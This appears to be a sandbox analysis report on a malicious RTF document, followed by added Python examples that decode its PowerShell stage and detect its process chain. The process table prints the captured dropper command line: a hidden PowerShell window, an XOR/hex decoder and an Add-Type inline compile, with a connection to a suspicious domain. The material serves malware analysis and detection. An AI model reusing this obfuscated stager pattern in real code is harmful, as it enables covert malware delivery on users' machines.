File name: | newdoc.doc |
Full analysis: | https://app.any.run/tasks/0c8e7ed2-db98-43e2-84a5-0c60e168a91a |
Verdict: | Malicious activity |
Analysis date: | October 09, 2019, 14:12:05 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | A757573938A4A607658A8CDA53197F20 |
SHA1: | C34CFE8839B81728E12F48DF713E414CD88E17CF |
SHA256: | C31EE1F58EC2B0A64D1831F81C6EA8244E92AD63DA3C5FBF211E70014ACB858C |
SSDEEP: | 1536:oZdVdUGXcirffa0nyH6D75orRSYp47VrNusr6lBjwjW3SAbEDCrOajsS:oHZXciryH6Zo5qpEEeaS |
Extension | Identified format |
---|---|
.rtf | Rich Text Format (100) |

Field | Value |
---|---|
InternalVersionNumber: | 57435 |
CharactersWithSpaces: | 4 |
Characters: | 4 |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
RevisionNumber: | 1 |
ModifyDate: | 2019:01:07 23:54:00 |
CreateDate: | 2019:01:07 23:54:00 |
LastModifiedBy: | Admin |
Author: | Admin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2824 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\newdoc.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000
3812 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Exit code: 0; Version: 14.0.6024.1000
3604 | powershell -WindowStyle Hidden function hd3ba2 { param($x9dcbc) $vad12 = 'j4aa49';$p262ef7 = ''; for ($i = 0; $i -lt $x9dcbc.length; $i+=2) { $w9ab74 = [convert]::ToByte($x9dcbc.Substring($i, 2), 16); $p262ef7 += [char]($w9ab74 -bxor $vad12[($i / 2) % $vad12.length]); } return $p262ef7; } $xb64aec = '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'; $xb64aec2 = hd3ba2($xb64aec); Add-Type -TypeDefinition $xb64aec2; [s76e188]::qc23eda(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3916 | "C:\Program Files\Microsoft Office\Office14\excelcnv.exe" -Embedding | C:\Program Files\Microsoft Office\Office14\excelcnv.exe | — | svchost.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Exit code: 0; Version: 14.0.6024.1000
3768 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\5memqf3_.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | — | powershell.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Visual C# Command Line Compiler; Exit code: 0; Version: 8.0.50727.4927 (NetFXspW7.050727-4900)
3652 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES60FA.tmp" "c:\Users\admin\AppData\Local\Temp\CSC60E9.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft® Resource File To COFF Object Conversion Utility; Exit code: 0; Version: 8.00.50727.4940 (Win7SP1.050727-5400)
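The powershell.exe command line above (PID 3604) carries its own decoder: hd3ba2 takes a hex string, converts two digits at a time to a byte, XORs each byte with the repeating key 'j4aa49', and returns the text, which Add-Type then compiles as C# source before [s76e188]::qc23eda() is called. Add-Type is what puts csc.exe (PID 3768) and cvtres.exe (PID 3652) under powershell.exe in the process table. The following is an added example, not code from the report or from the sample: a Python reimplementation of hd3ba2 that pulls the key and the hex blob out of the command line itself and checks that the decoded text defines the type and method the one-liner invokes. The hex payload was removed from this page, so the script builds a constructed stand-in blob (a harmless C# body with the same class and method names) with the same scheme; the class/method names and the key are the ones on the page, everything else in the sample is constructed.

```python
"""Decode the XOR-over-hex blob the dropper hands to Add-Type.

Added example (not code from the report): reimplements the hd3ba2 routine
from the captured powershell.exe command line and extracts the key and the
blob from the command line itself. The real hex payload is not on the page,
so a constructed stand-in is built with the same encoding.
"""
import re

ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")   # $name = '...'
KEY_USE_RE = re.compile(r"-bxor\s+\$(\w+)\[")         # ... -bxor $key[ ...
ENTRY_RE = re.compile(r"\[(\w+)\]::(\w+)\(\)")        # [Type]::Method()


def xor_hex_decode(hex_blob: str, key: str) -> str:
    """hd3ba2: two hex digits per byte, XOR with the repeating key's char codes."""
    out = []
    for i in range(0, len(hex_blob), 2):
        b = int(hex_blob[i:i + 2], 16)
        out.append(chr(b ^ ord(key[(i // 2) % len(key)])))
    return "".join(out)


def xor_hex_encode(text: str, key: str) -> str:
    """Inverse of xor_hex_decode; used only to build the constructed sample."""
    return "".join(f"{ord(c) ^ ord(key[i % len(key)]):02x}" for i, c in enumerate(text))


def extract_key_and_blob(cmdline: str) -> tuple:
    """The key is the single-quoted literal indexed by -bxor; the blob is the
    other single-quoted literal that is pure hex."""
    assigns = dict(ASSIGN_RE.findall(cmdline))
    key_var = KEY_USE_RE.search(cmdline).group(1)
    blob = next(v for n, v in assigns.items()
                if n != key_var and v and re.fullmatch(r"[0-9a-fA-F]+", v))
    return assigns[key_var], blob


def decode_add_type_payload(cmdline: str) -> dict:
    """Decode the blob and check it defines the type/method the one-liner
    invokes after Add-Type, i.e. the source that csc.exe will compile."""
    key, blob = extract_key_and_blob(cmdline)
    source = xor_hex_decode(blob, key)
    type_name, method = ENTRY_RE.search(cmdline).groups()
    return {
        "key": key,
        "source": source,
        "entry": f"{type_name}::{method}",
        "consistent": f"class {type_name}" in source and f"{method}(" in source,
    }


# Constructed stand-in for the removed payload: a harmless C# body that still
# matches the type and method the captured command line invokes.
SAMPLE_CSHARP = ('public class s76e188 { public static void qc23eda() '
                 '{ System.Console.WriteLine("stand-in"); } }')
SAMPLE_KEY = "j4aa49"   # the $vad12 value from the report

# The report's command line with the constructed blob in place of the removed one.
SAMPLE_CMDLINE = (
    "powershell -WindowStyle Hidden function hd3ba2 { param($x9dcbc) "
    "$vad12 = 'j4aa49';$p262ef7 = ''; for ($i = 0; $i -lt $x9dcbc.length; $i+=2) "
    "{ $w9ab74 = [convert]::ToByte($x9dcbc.Substring($i, 2), 16); "
    "$p262ef7 += [char]($w9ab74 -bxor $vad12[($i / 2) % $vad12.length]); } return $p262ef7; } "
    f"$xb64aec = '{xor_hex_encode(SAMPLE_CSHARP, SAMPLE_KEY)}'; "
    "$xb64aec2 = hd3ba2($xb64aec); Add-Type -TypeDefinition $xb64aec2; [s76e188]::qc23eda();"
)

if __name__ == "__main__":
    result = decode_add_type_payload(SAMPLE_CMDLINE)
    print(result["key"], result["entry"], result["consistent"])
    print(result["source"])
```

On a live capture, feed decode_add_type_payload the full command line from the process tree (EDR, Sysmon event 1 or the sandbox export) and save result["source"] as a .cs file; the decoded C# is the actual second stage, and it is what csc.exe wrote to 5memqf3_.dll in the files table below. The "consistent" flag is a cheap sanity check that the key and blob were picked up correctly before any time is spent reading the output.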
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2824 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4DDE.tmp.cvr | — | — | — |
3812 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR55BE.tmp.cvr | — | — | — |
3604 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XACL06STNEYW1SHC5O31.temp | — | — | — |
3916 | excelcnv.exe | C:\Users\admin\AppData\Local\Temp\CVR5D40.tmp.cvr | — | — | — |
3916 | excelcnv.exe | C:\Users\admin\AppData\Local\Temp\~DFF51FE0967661821D.TMP | — | — | — |
2824 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFACE1BD8AA1134693.TMP | — | — | — |
3768 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC60E9.tmp | — | — | — |
3652 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES60FA.tmp | — | — | — |
3768 | csc.exe | C:\Users\admin\AppData\Local\Temp\5memqf3_.dll | — | — | — |
3768 | csc.exe | C:\Users\admin\AppData\Local\Temp\5memqf3_.out | — | — | — |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3604 | powershell.exe | 23.95.236.179:443 | aagaeyarintz.com | ColoCrossing | US | suspicious |
— | — | 23.95.236.179:443 | aagaeyarintz.com | ColoCrossing | US | suspicious |
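The chain in the process and connection tables is what a detection should key on, and it has one trap: powershell.exe here is a child of wmiprvse.exe, not of WINWORD.EXE or EXCEL.EXE, so a rule that only looks for PowerShell spawned directly by an Office binary never fires on this sample. The following is an added example, not part of the report: the events are constructed to mirror the rows above (PIDs, images, parent images and abbreviated command lines are taken from the tables), and since the page lists parent images rather than parent PIDs, parents are matched by image name (in real telemetry match on the parent PID). The rule names and the "..." abbreviations in the command lines are the example's own.

```python
"""Detection logic for the process and network chain in this report.

Added example, not part of the report. Events are constructed to mirror
the report's rows; "..." marks parts of a command line abbreviated here.
"""

OFFICE_IMAGES = {"winword.exe", "excel.exe", "excelcnv.exe", "powerpnt.exe"}
COMPILERS = {"csc.exe", "vbc.exe"}   # Add-Type compiles via csc.exe (C#) or vbc.exe (VB)

# Constructed process events mirroring the report's process table (parent = parent image).
PROCESSES = [
    {"pid": 2824, "image": "WINWORD.EXE", "parent": "explorer.exe",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\newdoc.doc.rtf"'},
    {"pid": 3812, "image": "EXCEL.EXE", "parent": "svchost.exe",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding'},
    {"pid": 3604, "image": "powershell.exe", "parent": "wmiprvse.exe",
     "cmdline": "powershell -WindowStyle Hidden function hd3ba2 { ... "
                "[convert]::ToByte($x9dcbc.Substring($i, 2), 16) ... -bxor $vad12[...] ... } "
                "... Add-Type -TypeDefinition $xb64aec2; [s76e188]::qc23eda();"},
    {"pid": 3916, "image": "excelcnv.exe", "parent": "svchost.exe",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office14\excelcnv.exe" -Embedding'},
    {"pid": 3768, "image": "csc.exe", "parent": "powershell.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\5memqf3_.cmdline"'},
    {"pid": 3652, "image": "cvtres.exe", "parent": "csc.exe",
     "cmdline": r'C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ...'},
]

# Constructed network event mirroring the report's connections table.
NETWORK = [
    {"pid": 3604, "image": "powershell.exe", "dst": "23.95.236.179:443", "domain": "aagaeyarintz.com"},
]


def office_parent_hits(procs):
    """The naive rule: PowerShell launched directly by an Office binary. Returns [] on this sample."""
    return [p["pid"] for p in procs
            if p["image"].lower() == "powershell.exe" and p["parent"].lower() in OFFICE_IMAGES]


def evaluate(procs, net):
    """Return (rule, pid) findings for the chain this report shows."""
    findings = []
    for p in procs:
        img, parent, cmd = p["image"].lower(), p["parent"].lower(), p["cmdline"].lower()
        # Processes created through WMI (e.g. Win32_Process.Create) appear under
        # wmiprvse.exe, which hides the Office parent from parent-child rules.
        if img == "powershell.exe" and parent == "wmiprvse.exe":
            findings.append(("wmi_spawned_powershell", p["pid"]))
        # Inline C# compile plus a hand-rolled XOR/hex decoder in the same command line.
        if img == "powershell.exe" and "add-type" in cmd and \
                ("-bxor" in cmd or "[convert]::tobyte(" in cmd):
            findings.append(("inline_csharp_with_xor_decoder", p["pid"]))
        # Add-Type's compile step: csc.exe (then cvtres.exe) under powershell.exe.
        if img in COMPILERS and parent == "powershell.exe":
            findings.append(("compiler_spawned_by_powershell", p["pid"]))
        # Office binaries started with -Embedding from svchost.exe are COM activations
        # (an embedded object being instantiated), not a user opening a file.
        if img in OFFICE_IMAGES and "-embedding" in cmd and parent == "svchost.exe":
            findings.append(("office_app_started_via_com_activation", p["pid"]))
    flagged = {pid for rule, pid in findings if rule.startswith(("wmi_", "inline_"))}
    for n in net:
        if n["pid"] in flagged:
            findings.append(("network_from_flagged_powershell", n["pid"]))
    return findings


if __name__ == "__main__":
    print("office-parent rule hits:", office_parent_hits(PROCESSES))
    for rule, pid in evaluate(PROCESSES, NETWORK):
        print(f"{pid:>5}  {rule}")
```

The two Office rows started with -Embedding are reported as context rather than as alerts on their own: COM activation of Excel from an RTF is how an embedded object gets instantiated and is also how legitimate embedded workbooks open. The alerting signals are the WMI-spawned PowerShell, the Add-Type/XOR command line, the compiler it spawns and the outbound 443 connection from that same PID.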
Domain | IP | Reputation |
---|---|---|
aagaeyarintz.com | — | suspicious |
Process | Message |
---|---|
csc.exe | *** HR originated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |

The HRESULT -2147024774 is 0x8007007A, i.e. Win32 error 122 (ERROR_INSUFFICIENT_BUFFER) wrapped with FACILITY_WIN32: a buffer-size probe inside the side-by-side isolation code that csc.exe routinely emits when it starts. These messages carry no signal of their own; the indicator is that csc.exe ran at all, as a child of powershell.exe, which is the Add-Type compile step from the command line in the process table.